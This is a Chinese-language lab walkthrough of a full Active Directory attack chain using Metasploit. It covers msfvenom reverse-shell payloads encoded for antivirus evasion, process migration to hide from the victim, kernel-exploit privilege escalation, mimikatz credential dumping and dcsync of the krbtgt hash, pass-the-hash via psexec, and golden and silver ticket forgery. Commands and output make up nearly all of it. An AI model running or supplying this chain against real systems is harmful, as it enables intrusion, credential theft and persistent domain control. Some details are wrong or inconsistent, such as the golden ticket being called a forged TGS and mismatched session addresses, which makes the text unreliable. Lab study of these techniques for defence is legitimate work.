使用 MSF 进行 PtH 和 PtT
0x00 概述
环境
攻击机 MSF:172.20.10.2
DC (Server2008R2X64):10.11.11.5
目标机 (Win7ProX86):10.11.11.14PtH 和 PtT
PtH 一般用来进行域内横向
PtT 一般是在已经获取域控的前提下利用,用来做权限维持
0x01 前期准备
生成 payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.20.10.2 LPORT=4444 -b '\x00\x0a\xff' --platform windows -a x86 -e x86/shikata_ga_nai -i 5 -f exe -o 86.exe msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.20.10.2 LPORT=4444 -b '\x00' --platform windows -a x64 -e x64/xor -i 5 -f exe -o 64.exe # -p 指定 payload (用 msfvenom -l payloads 可查看所有 payload) # -a 指定目标指令集架构 # -e 指定用什么编码器编码(多次编码变幻可以免杀,用 msfvenom -l encoders 可查看编码类型) # -i 指定编码迭代的次数 # --platform 执行目标的平台 # -f 指定输出格式,可用 msfvenom --help-formats查看配置监听
ExitOnSession 在接收到 seesion 后继续监听端口,防止假死与假 session
SessionCommunicationTimeout 默认情况下,会话在 5 分钟没有任何活动会被杀死,可将此项修改为 0
SessionExpirationTimeout 默认情况下,一个星期后,会话将被强制关闭,修改为0可永久不会被关闭
EnableStageEncoding 用来设置二级有效负载是否进行编码
StageEncoder 指定编码器类型
StageEncoder 指定的编码器对有效负载编码时失败后,是否回退到默认编码器(例如 x86/shikata_ga_nai)。如果将 set StageEncodingFallback 设置为 false,则在编码失败时将不会回退到默认编码器。这可以帮助确保有效负载编码的一致性和可靠性。
exploit -j -z -j 为后台任务,-z 为成功后不主动发送 stagemsf > use exploit/multi/handler msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set LHOST 0.0.0.0 msf exploit(multi/handler) > set LPORT 4444 msf exploit(multi/handler) > set ExitOnSession false msf exploit(multi/handler) > set SessionCommunicationTimeout 36000 msf exploit(multi/handler) > set SessionExpirationTimeout 36000 // msf exploit(multi/handler) > set EnableStageEncoding true // msf exploit(multi/handler) > set StageEncoder x64/xor // msf exploit(multi/handler) > set StageEncodingFallback false msf exploit(multi/handler) > exploit -j -z [*] Exploit running as background job 0. [*] Started reverse TCP handler on 0.0.0.0:4444 msf exploit(multi/handler) > jobs Jobs ==== Id Name Payload Payload opts -- ---- ------- ------------ 0 Exploit: multi/handler windows/meterpreter/reverse_tcp tcp://0.0.0.0:4444
0x02 目标机反弹 shell
在目标主机上执行生成的 payload:86.exe,收到 shell
msf6 exploit(multi/handler) > [*] Sending stage (175686 bytes) to 172.20.10.2 [*] Meterpreter session 1 opened (172.20.10.2:4444 -> 172.20.10.2:60181) at 2023-03-06 12:31:17 +0800 msf6 exploit(multi/handler) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/windows TEST\zhangsan @ WIN7PRO 172.20.10.2:4444 -> 172.20.10.14:60997 (172.20.10.14) msf6 exploit(multi/handler) > sessions 1 [*] Starting interaction with 1... meterpreter > getuid Server username: TEST\zhangsan进程迁移
将进程迁移到了资源管理器,防止目标通过任务管理器或者使用 tasklist 看到我们的进程。
一般注入 svchost.exe、explorer.exe、lsass.exe、services.exe、winlogon.exe、rundll32.exe、taskhost.exe、spoolsv.exemeterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System 272 4 smss.exe 444 384 winlogon.exe 504 396 lsass.exe 692 832 dwm.exe x86 1 TEST\zhangsan C:\Windows\system32\Dwm.exe 808 1272 explorer.exe x86 1 TEST\zhangsan C:\Windows\Explorer.EXE 1548 488 kms-server.exe 1964 488 taskhost.exe x86 1 TEST\zhangsan C:\Windows\system32\taskhost.exe 2072 2748 msiexec.exe x86 1 C:\Windows\System32\msiexec.exe meterpreter > migrate 808 [*] Migrating from 2748 to 808... [*] Migration completed successfully. meterpreter > background [*] Backgrounding session 1...进行提权
通过 local_exploit_suggester 获取 msf 建议的 exploit
msf6 exploit(multi/handler) > run post/multi/recon/local_exploit_suggester msf6 post(multi/recon/local_exploit_suggester) > set session 1 msf6 post(multi/recon/local_exploit_suggester) > run [*] 172.20.10.2 - Collecting local exploits for x86/windows... [*] 172.20.10.2 - 168 exploit checks are being tried... [+] 172.20.10.2 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable. [+] 172.20.10.2 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated. [+] 172.20.10.2 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated. [+] 172.20.10.2 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [*] Running check method for exploit 41 / 41 [*] 172.20.10.2 - Valid modules for session 3: ============================ # Name Potentially Vulnerable? Check Result - ---- ----------------------- ------------ 1 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable. 2 exploit/windows/local/ms10_015_kitrap0d Yes The service is running, but could not be validated. 3 exploit/windows/local/ms15_004_tswbproxy Yes The service is running, but could not be validated. 4 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable. 5 exploit/windows/local/bthpan No The target is not exploitable. 。。。。 。。。。 [*] Post module execution completed利用 msf 建议的 exploit 进行提权
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d msf6 exploit(exploit/windows/local/ms10_015_kitrap0d) > set session 1 msf6 exploit(windows/local/ms10_015_kitrap0d) > run [*] Started reverse TCP handler on 172.20.10.2:4444 [*] Reflectively injecting payload and triggering the bug... [*] Launching msiexec to host the DLL... [+] Process 2072 launched. [*] Reflectively injecting the DLL into 2072... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Sending stage (175686 bytes) to 172.20.10.2 [*] Meterpreter session 2 opened (172.20.10.2:4444 -> 172.20.10.14:61686) at 2023-03-06 12:40:02 +0800 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > shell Process 680 created. Channel 2 created. Microsoft Windows [�汾 6.1.7600] ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ�� C:\Users\zhangsan\Desktop>chcp 65001 chcp 65001 Active code page: 65001 C:\Users\zhangsan\Desktop>net group "domain admins" /domain net group "domain admins" /domain The request will be processed at a domain controller for domain test.com. Group name Domain Admins Comment ָ���������Ա Members ------------------------------------------------------------------------------- admin Administrator The command completed successfully. C:\Users\zhangsan\Desktop>exit exit meterpreter > background [*] Backgrounding session 2... msf6 exploit(windows/local/ms10_015_kitrap0d) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/windows TEST\zhangsan @ WIN7PRO 172.20.10.2:4444 -> 172.20.10.14:60181 (172.20.10.14) 2 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN7PRO 172.20.10.2:4444 -> 172.20.10.14:61686 (172.20.10.14)
0x03 进行 Hash 传递攻击(PtH)
首先通过域内用户 SYSTEM 权限得到 ntlm hash
msf6 exploit(windows/local/ms10_015_kitrap0d) > sessions 2 [*] Starting interaction with 2... meterpreter > load kiwi meterpreter > kiwi_cmd sekurlsa::logonpasswords Authentication Id : 0 ; 405357 (00000000:00062f6d) Session : CachedInteractive from 1 User Name : Administrator Domain : TEST Logon Server : WIN-2008 Logon Time : 2023/3/5 21:06:10 SID : S-1-5-21-3160176211-3702513722-812664031-500 msv : [00000003] Primary * Username : Administrator * Domain : TEST * LM : f26fb3ae03e93ab913328873c0db4945 * NTLM : 0e032b9d51a580ac6cdfabad8bc97a38 * SHA1 : c17a16040770e68ea65ce528b5f503dba3663d16 ...... ...... Authentication Id : 0 ; 136194 (00000000:00021402) Session : Interactive from 1 User Name : zhangsan Domain : TEST Logon Server : WIN-2008 Logon Time : 2023/3/5 20:31:02 SID : S-1-5-21-3160176211-3702513722-812664031-1118 msv : [00000003] Primary * Username : zhangsan * Domain : TEST * LM : 1c27b75762feeeb3e72c57ef50f76a05 * NTLM : 993ca38cf7795d31bc429a8b9903a01a * SHA1 : 491010a4fb3715098e98c855175c841ac2d1badc ...... ......查看域内管理员组用户
meterpreter > shell Process 716 created. Channel 3 created. Microsoft Windows [�汾 6.1.7600] ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ�� C:\Users\zhangsan\Desktop>chcp 65001 chcp 65001 Active code page: 65001 C:\Users\zhangsan\Desktop>net group "domain admins" /domain net group "domain admins" /domain The request will be processed at a domain controller for domain test.com. Members ------------------------------------------------------------------------------- admin Administrator The command completed successfully. meterpreter > background [*] Backgrounding session 2...进行 pth 获取 DC 的权限
使用域内管理员组用户的 hash,这里用 admin 这个用户
msf6 exploit(windows/local/ms10_015_kitrap0d) > use exploit/windows/smb/psexec msf6 exploit(windows/smb/psexec) > options Module options (exploit/windows/smb/psexec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 10.11.11.5 yes The target host(s), see https://docs.metasploit.com/docs/usi ng-metasploit/basics/using-metasploit.html RPORT 445 yes The SMB service port (TCP) SERVICE_DESCRIPTION no Service description to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SMBDomain test.com no The Windows domain to use for authentication SMBPass 00000000000000000000000000000000: no The password for the specified username 209c6174da490caeb422f3fa5a7ae634 SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,.. .) or a normal read/write folder share SMBUser admin no The username to authenticate as Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 172.20.10.2 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic View the full module info with the info, or info -d command. msf6 exploit(windows/smb/psexec) > run [*] Started reverse TCP handler on 172.20.10.2:4444 [*] 10.11.11.5:445 - Connecting to the server... [*] 10.11.11.5:445 - Authenticating to 10.11.11.5:445|test.com as user 'admin'... [*] 10.11.11.5:445 - Selecting native target [*] 10.11.11.5:445 - Uploading payload... qusizJPL.exe [*] 10.11.11.5:445 - Created \qusizJPL.exe... [+] 10.11.11.5:445 - Service started successfully... [*] Sending stage (175686 bytes) to 172.20.10.2 [*] 10.11.11.5:445 - Deleting \qusizJPL.exe... [*] Meterpreter session 7 opened (172.20.10.2:4444 -> 172.20.10.5:65265) at 2023-03-06 14:28:01 +0800 meterpreter > ifconfig Interface 65539 ============ Name : Parallels Ethernet Adapter Hardware MAC : 00:1c:42:5e:07:99 MTU : 1500 IPv4 Address : 10.11.11.5 IPv4 Netmask : 255.255.255.0
0x04 黄金票据
黄金票据是伪造 TGS,一般拿下域控后用来维权,因为 krbtgt 域账户的密码基本不会更改
利用条件
- 域名称
- 域 SID
- krbtgt NTLM-Hash(需要拿下域控)
域内普通用户 shell 获取 DC 名称
改编码
C:\Windows\system32>chcp 65001 chcp 65001 Active code page: 65001net config workstation | findstr domain 得到域名称
C:\Users\zhangsan\Desktop>net config workstation | findstr domain net config workstation | findstr domain Workstation domain TEST Logon domain TESTnltest /dsgetdc:TEST 得到 dc 主机名为
\\WIN-2008C:\Users\zhangsan\Desktop>nltest /dsgetdc:TEST nltest /dsgetdc:TEST DC: \\WIN-2008 Address: \\10.11.11.5 Dom Guid: 319da0ce-39fd-4861-8e18-6a2264cfe874 Dom Name: TEST Forest Name: test.com Dc Site Name: Default-First-Site-Name Our Site Name: Default-First-Site-Name Flags: PDC GC DS LDAP KDC TIMESERV GTIMESERV WRITABLE DNS_FOREST CLOSE_SITE FULL_SECRET WS The command completed successfully
域内普通用户获取域 SID
kiwi_cmd token::whoami
meterpreter > kiwi_cmd token::whoami * Process Token : {0;0001a410} 1 D 111721 TEST\zhangsan S-1-5-21-3160176211-3702513722-812664031-1118 (10g,05p) Primary * Thread Token : no tokenwhoami /user
C:\Windows\system32>whoami /user whoami /user USER INFORMATION ---------------- User Name SID ============= ============================================= test\zhangsan S-1-5-21-3160176211-3702513722-812664031-1118wmic useraccount get name,sid
C:\Users\zhangsan\Desktop>wmic useraccount get name,sid wmic useraccount get name,sid Name SID Administrator S-1-5-21-2772043085-310273303-638560154-500 Guest S-1-5-21-2772043085-310273303-638560154-501 reber S-1-5-21-2772043085-310273303-638560154-1000 Administrator S-1-5-21-3160176211-3702513722-812664031-500 Guest S-1-5-21-3160176211-3702513722-812664031-501 krbtgt S-1-5-21-3160176211-3702513722-812664031-502 zhangsan S-1-5-21-3160176211-3702513722-812664031-1118 lisi S-1-5-21-3160176211-3702513722-812664031-1126 admin S-1-5-21-3160176211-3702513722-812664031-1128
域内管理员组用户权限获取 krbtgt NTLM-Hash
kiwi 模块同时支持 32 位和 64 位操作系统,默认加载是 32 位操作系统
如果当前 session 为 x86,dc 为 x64,则要先注入到 x64meterpreter > load kiwi Success. meterpreter > kiwi_cmd lsadump::dcsync /domain:test.com /all /csv 502 krbtgt 3f92886413f9d4ab78e03c6275a71b85 514 1127 WIN2003$ 5ad1bf868f8ddbe900c15dfe82e6c08e 4096 1008 WIN-2008$ f048fbe3fc1722d6a83388364dab9cdc 532480 500 Administrator 0e032b9d51a580ac6cdfabad8bc97a38 512 1118 zhangsan 993ca38cf7795d31bc429a8b9903a01a 66048 1126 lisi 6447286bfde2f1ac790331e33b819657 66048 1123 WIN7PRO2$ c4f03bb85e00c17788e8d9ee5c60aef0 4096 1122 WIN7PRO$ 2d688c9797ca9f14639c541f289479ed 4096 1128 admin 209c6174da490caeb422f3fa5a7ae634 66048域内管理员组用户权限生成票据
meterpreter > golden_ticket_create -d test.com -s S-1-5-21-3160176211-3702513722-812664031 -k 3f92886413f9d4ab78e03c6275a71b85 -u abc -t /tmp/abc.kirbi域内普通用户导入票据
meterpreter > getuid Server username: TEST\zhangsan meterpreter > kerberos_ticket_purge [+] Kerberos tickets purged meterpreter > kerberos_ticket_use /tmp/abc.kirbi [*] Using Kerberos ticket stored in /tmp/abc.kirbi, 1820 bytes ... [+] Kerberos ticket applied successfully. meterpreter > kerberos_ticket_list [+] Kerberos tickets found in the current session. [00000000] - 0x00000017 - rc4_hmac_nt Start/End/MaxRenew: 2023/3/24 4:11:16 ; 2033/3/21 12:11:16 ; 2033/3/21 12:11:16 Server Name : krbtgt/test.com @ test.com Client Name : abc @ test.com Flags 40e00000 : pre_authent ; initial ; renewable ; forwardable ; meterpreter > shell Process 3796 created. Channel 2 created. Microsoft Windows [�汾 6.1.7600] ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ�� C:\Users\zhangsan\Desktop>chcp 65001 chcp 65001 Active code page: 65001 C:\Users\zhangsan\Desktop>dir \\WIN-2008\C$ dir \\WIN-2008\C$ Volume in drive \\WIN-2008\C$ has no label. Volume Serial Number is B08C-EB53 Directory of \\WIN-2008\C$ 2009/07/13 20:20 <DIR> PerfLogs 2018/07/26 21:51 <DIR> Program Files 2023/03/02 20:45 <DIR> Program Files (x86) 2017/09/12 20:49 <DIR> Users 2023/03/06 00:44 <DIR> Windows 0 File(s) 0 bytes 5 Dir(s) 124,080,254,976 bytes free
0x05 白银票据
白银票据是伪造 TGS,不会经过 KDC,更加隐蔽,但权限就远不如黄金票据
可利用服务
服务 服务名 WMI HOST、RPCSS PowerShell Remoting HOST、HTTP WinRM HOST、HTTP Scheduled Tasks HOST Windows File Share (CIFS) CIFS LDAP、DCSync LDAP Windows Remote Server RPCSS、LDAP、CIFS 利用条件
- 域名称
- 域 SID
- 服务账号的 NTLM-Hash
- 目标服务器 FQDN
- 可利用的服务
域内用户 SYSTEM 权限获取域名称、SID、NTLM-Hash
Domain : TEST
User Server : DC$
SID : S-1-5-21-3160176211-3702513722-812664031
NTLM : 993ca38cf7795d31bc429a8b9903a01ameterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > load kiwi Success. meterpreter > kiwi_cmd sekurlsa::logonpasswords Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 User Name : DC$ Domain : TEST Logon Server : (null) Logon Time : 2023/3/25 10:42:15 SID : S-1-5-20 msv : [00000003] Primary * Username : DC$ * Domain : TEST * NTLM : 993ca38cf7795d31bc429a8b9903a01a * SHA1 : 104c7eec951d84ce412bd21e123b67520688f570 meterpreter > shell Process 2732 created. Channel 3 created. Microsoft Windows [�汾 6.1.7600] ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ�� C:\Windows\system32>wmic useraccount get name,sid wmic useraccount get name,sid Name SID Administrator S-1-5-21-3160176211-3702513722-812664031-500 Guest S-1-5-21-3160176211-3702513722-812664031-501 krbtgt S-1-5-21-3160176211-3702513722-812664031-502 zhangsan S-1-5-21-3160176211-3702513722-812664031-1118 lisi S-1-5-21-3160176211-3702513722-812664031-1126 admin S-1-5-21-3160176211-3702513722-812664031-1128域内普通用户权限直接导入票据
meterpreter > getuid Server username: TEST\zhangsan meterpreter > kerberos_ticket_purge [+] Kerberos tickets purged meterpreter > kiwi_cmd kerberos::golden /domain:test.com /sid:S-1-5-21-3160176211-3702513722-812664031 /target:dc.test.com /service:cifs /rc4:993ca38cf7795d31bc429a8b9903a01a /user:abc /ptt User : abc Domain : test.com (TEST) SID : S-1-5-21-3160176211-3702513722-812664031 User Id : 500 Groups Id : *513 512 520 518 519 ServiceKey: 993ca38cf7795d31bc429a8b9903a01a - rc4_hmac_nt Service : cifs Target : dc.test.com Lifetime : 2023/3/24 22:30:08 ; 2033/3/21 22:30:08 ; 2033/3/21 22:30:08 -> Ticket : ** Pass The Ticket ** * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Golden ticket for 'abc @ test.com' successfully submitted for current session meterpreter > kerberos_ticket_list [+] Kerberos tickets found in the current session. [00000000] - 0x00000017 - rc4_hmac_nt Start/End/MaxRenew: 2023/3/24 22:30:08 ; 2033/3/21 22:30:08 ; 2033/3/21 22:30:08 Server Name : cifs/dc.test.com @ test.com Client Name : abc @ test.com Flags 40a00000 : pre_authent ; renewable ; forwardable ;导入白银票据后可直接查看域控的 C 盘文件
meterpreter > shell Process 2004 created. Channel 1 created. Microsoft Windows [�汾 6.1.7600] ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ�� C:\Users\zhangsan\Desktop>chcp 65001 chcp 65001 Active code page: 65001 C:\Users\zhangsan\Desktop>dir \\win-2008\c$ dir \\win-2008\c$ Volume in drive \\win-2008\c$ has no label. Volume Serial Number is B08C-EB53 Directory of \\win-2008\c$ 2009/07/13 20:20 <DIR> PerfLogs 2018/07/26 21:51 <DIR> Program Files 2023/03/02 20:45 <DIR> Program Files (x86) 2017/09/12 20:49 <DIR> Users 2023/03/06 00:44 <DIR> Windows 0 File(s) 0 bytes 5 Dir(s) 124,094,062,592 bytes free